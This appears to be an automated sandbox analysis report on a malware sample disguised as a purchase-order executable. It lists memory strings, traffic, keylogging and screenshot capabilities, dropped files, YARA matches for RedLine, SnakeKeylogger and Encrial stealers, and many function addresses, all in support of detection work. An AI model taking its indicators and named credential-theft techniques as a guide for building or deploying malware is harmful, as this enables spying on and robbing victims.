Source: alg.exe, 0000000B.00000003.2653939958.00000000007B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: officesvcmgr.exe.11.dr	String found in binary or memory: https://nexusrules.officeapps.live.comhttps://nexus.officeapps.live.com/nexus/upload//nexus/rulesX-M
Source: powershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: officesvcmgr.exe.11.dr	String found in binary or memory: https://otelrules.azureedge.net/rules/UniversaliOSFailed
Source: alg.exe, 0000000B.00000003.1811642166.0000000001830000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1810321677.00000000014B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
Source: alg.exe, 0000000B.00000003.1811642166.0000000001830000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1810999604.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pcnatrk.net/track.
Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
Source: alg.exe, 0000000B.00000003.2487771643.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2439037295.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2478810531.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2520863860.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1800763144.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2469824753.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2378250354.00000000007F0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374643516.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2379239064.0000000001780000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2428261033.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811075524.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1827012271.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2403997151.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374942508.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2448551766.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811544228.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2450029854.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1800787635.00000000017C0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2519990908.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1800665917.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374357802.00000000007F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: Microsofts.exe.8.dr, UltraSpeed.cs

.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: Microsofts.exe.8.dr, UltraSpeed.cs

.Net Code: VKCodeToUnicode

Source: officesvcmgr.exe.11.dr

Binary or memory string: RegisterRawInputDevices

memstr_cb3ae7d6-1

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.zeXKjViL.exe.41ea2c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4057ae0.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3eedac0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4057ae0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.zeXKjViL.exe.40802a8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.zeXKjViL.exe.40802a8.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3eedac0.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Microsofts.exe PID: 2124, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth

.NET source code contains very large array initializations

Source: PO_2024_056209_MQ04865_ENQ_1045.exe, CustomerQueueForm.cs

Large array initialization: : array initializer size 1365018

.NET source code contains very large strings

Source: Trading_AIBot.exe.8.dr, cfRDgxIJtEfCD.cs

Long String: Length: 17605

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

File dump: apihost.exe.17.dr 665670656

Jump to dropped file

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PO_2024_056209_MQ04865_ENQ_1045.exe

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a5f0bea56967b89b.bin

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 0_2_0596BFD0	0_2_0596BFD0
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 0_2_05961D88	0_2_05961D88
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 0_2_0596DB90	0_2_0596DB90
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 0_2_07AC0040	0_2_07AC0040
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_00408C60	8_2_00408C60
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_0040DC11	8_2_0040DC11
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_00407C3F	8_2_00407C3F
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_00418CCC	8_2_00418CCC
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_00406CA0	8_2_00406CA0
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_004028B0	8_2_004028B0
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_0041A4BE	8_2_0041A4BE
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_00408C60	8_2_00408C60
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_00418244	8_2_00418244
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_00401650	8_2_00401650
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_00402F20	8_2_00402F20
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_004193C4	8_2_004193C4
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_00418788	8_2_00418788
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_00402F89	8_2_00402F89
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_00402B90	8_2_00402B90
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_004073A0	8_2_004073A0
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BD7B71	8_2_02BD7B71
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02C100D9	8_2_02C100D9
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02C05980	8_2_02C05980
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BD51EE	8_2_02BD51EE
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BD6EAF	8_2_02BD6EAF
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02C139A3	8_2_02C139A3
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02C0C7F0	8_2_02C0C7F0
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02BD7F80	8_2_02BD7F80
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02C03780	8_2_02C03780
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_02C0D580	8_2_02C0D580
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_036A1020	8_2_036A1020
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 8_2_036A1030	8_2_036A1030
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 10_2_0558C450	10_2_0558C450
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 10_2_0558C440	10_2_0558C440
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 10_2_05580F64	10_2_05580F64
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 10_2_05582ED8	10_2_05582ED8
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 10_2_05582EC8	10_2_05582EC8
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 10_2_076BBFD0	10_2_076BBFD0
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 10_2_076B4AAE	10_2_076B4AAE
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 10_2_076B1D88	10_2_076B1D88
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 10_2_076BDB90	10_2_076BDB90
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 10_2_09430040	10_2_09430040
Source: C:\Windows\System32\AppVClient.exe	Code function: 15_2_00B3A810	15_2_00B3A810
Source: C:\Windows\System32\AppVClient.exe	Code function: 15_2_00B17C00	15_2_00B17C00
Source: C:\Windows\System32\AppVClient.exe	Code function: 15_2_00B179F0	15_2_00B179F0
Source: C:\Windows\System32\AppVClient.exe	Code function: 15_2_00B42D40	15_2_00B42D40
Source: C:\Windows\System32\AppVClient.exe	Code function: 15_2_00B3EEB0	15_2_00B3EEB0
Source: C:\Windows\System32\AppVClient.exe	Code function: 15_2_00B392A0	15_2_00B392A0
Source: C:\Windows\System32\AppVClient.exe	Code function: 15_2_00B393B0	15_2_00B393B0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_0245C168	19_2_0245C168
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_0245CA58	19_2_0245CA58
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_024519B8	19_2_024519B8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_02457E68	19_2_02457E68
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_02454F08	19_2_02454F08
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_02452DD1	19_2_02452DD1
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_0245CAAE	19_2_0245CAAE
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_0245B9DC	19_2_0245B9DC
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_0245B9E0	19_2_0245B9E0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_02457E66	19_2_02457E66
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_02454EF8	19_2_02454EF8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B91C58	19_2_04B91C58
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9ED80	19_2_04B9ED80
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B915F8	19_2_04B915F8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B94500	19_2_04B94500
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B97770	19_2_04B97770
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B96998	19_2_04B96998
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B90498	19_2_04B90498
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B99C90	19_2_04B99C90
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9048A	19_2_04B9048A
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9BC80	19_2_04B9BC80
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9E4D0	19_2_04B9E4D0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9E4C0	19_2_04B9E4C0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9DC20	19_2_04B9DC20
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9DC11	19_2_04B9DC11
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9BC71	19_2_04B9BC71
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B93C50	19_2_04B93C50
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B93C42	19_2_04B93C42
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B915EA	19_2_04B915EA
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9CDE0	19_2_04B9CDE0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9CDD0	19_2_04B9CDD0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B90D3A	19_2_04B90D3A
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9C530	19_2_04B9C530
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9C520	19_2_04B9C520
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9ED70	19_2_04B9ED70
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B90D48	19_2_04B90D48
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9A6B9	19_2_04B9A6B9
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9D690	19_2_04B9D690
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9D681	19_2_04B9D681
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9A6C8	19_2_04B9A6C8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9F630	19_2_04B9F630
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9F620	19_2_04B9F620
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B99E18	19_2_04B99E18
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B937F8	19_2_04B937F8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B937E8	19_2_04B937E8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B92F38	19_2_04B92F38
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9AF78	19_2_04B9AF78
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9AF68	19_2_04B9AF68
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B92F48	19_2_04B92F48
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B940A8	19_2_04B940A8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B94098	19_2_04B94098
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B908F0	19_2_04B908F0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9C0D8	19_2_04B9C0D8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B908DF	19_2_04B908DF
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9C0CA	19_2_04B9C0CA
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9B828	19_2_04B9B828
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9B818	19_2_04B9B818
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B90006	19_2_04B90006
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9E078	19_2_04B9E078
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9E068	19_2_04B9E068
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B90040	19_2_04B90040
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B911A0	19_2_04B911A0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9C988	19_2_04B9C988
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9118F	19_2_04B9118F
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9F1D8	19_2_04B9F1D8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9F1C8	19_2_04B9F1C8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9E928	19_2_04B9E928
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9E922	19_2_04B9E922
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9C97A	19_2_04B9C97A
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9FA88	19_2_04B9FA88
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B92AF0	19_2_04B92AF0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B92AE0	19_2_04B92AE0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9D238	19_2_04B9D238
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9D22A	19_2_04B9D22A
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9FA78	19_2_04B9FA78
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9A270	19_2_04B9A270
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9A261	19_2_04B9A261
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B933A0	19_2_04B933A0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B93391	19_2_04B93391
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9B3D0	19_2_04B9B3D0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9B3C1	19_2_04B9B3C1
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9AB20	19_2_04B9AB20
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B9AB10	19_2_04B9AB10
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 19_2_04B91B4A	19_2_04B91B4A
Source: C:\Windows\System32\FXSSVC.exe	Code function: 20_2_00C97C00	20_2_00C97C00
Source: C:\Windows\System32\FXSSVC.exe	Code function: 20_2_00CBA810	20_2_00CBA810
Source: C:\Windows\System32\FXSSVC.exe	Code function: 20_2_00C979F0	20_2_00C979F0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 20_2_00CC2D40	20_2_00CC2D40
Source: C:\Windows\System32\FXSSVC.exe	Code function: 20_2_00CB92A0	20_2_00CB92A0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 20_2_00CBEEB0	20_2_00CBEEB0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 20_2_00CB93B0	20_2_00CB93B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_04F2B490	22_2_04F2B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_04F2B470	22_2_04F2B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_08F63E98	22_2_08F63E98
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 26_2_00897C00	26_2_00897C00
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 26_2_008BA810	26_2_008BA810
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 26_2_008979F0	26_2_008979F0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 26_2_008C2D40	26_2_008C2D40
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 26_2_008B92A0	26_2_008B92A0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 26_2_008BEEB0	26_2_008BEEB0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 26_2_008B93B0	26_2_008B93B0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 27_2_00CD7C00	27_2_00CD7C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 27_2_00CFA810	27_2_00CFA810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 27_2_00CD79F0	27_2_00CD79F0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 27_2_00D02D40	27_2_00D02D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 27_2_00CF92A0	27_2_00CF92A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 27_2_00CFEEB0	27_2_00CFEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 27_2_00CF93B0	27_2_00CF93B0
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 34_2_01088286	34_2_01088286
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 34_2_01086EAF	34_2_01086EAF
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 34_2_01087B71	34_2_01087B71
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 34_2_010B05D0	34_2_010B05D0
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 34_2_01087F80	34_2_01087F80
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 34_2_03681020	34_2_03681020
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 34_2_03681030	34_2_03681030
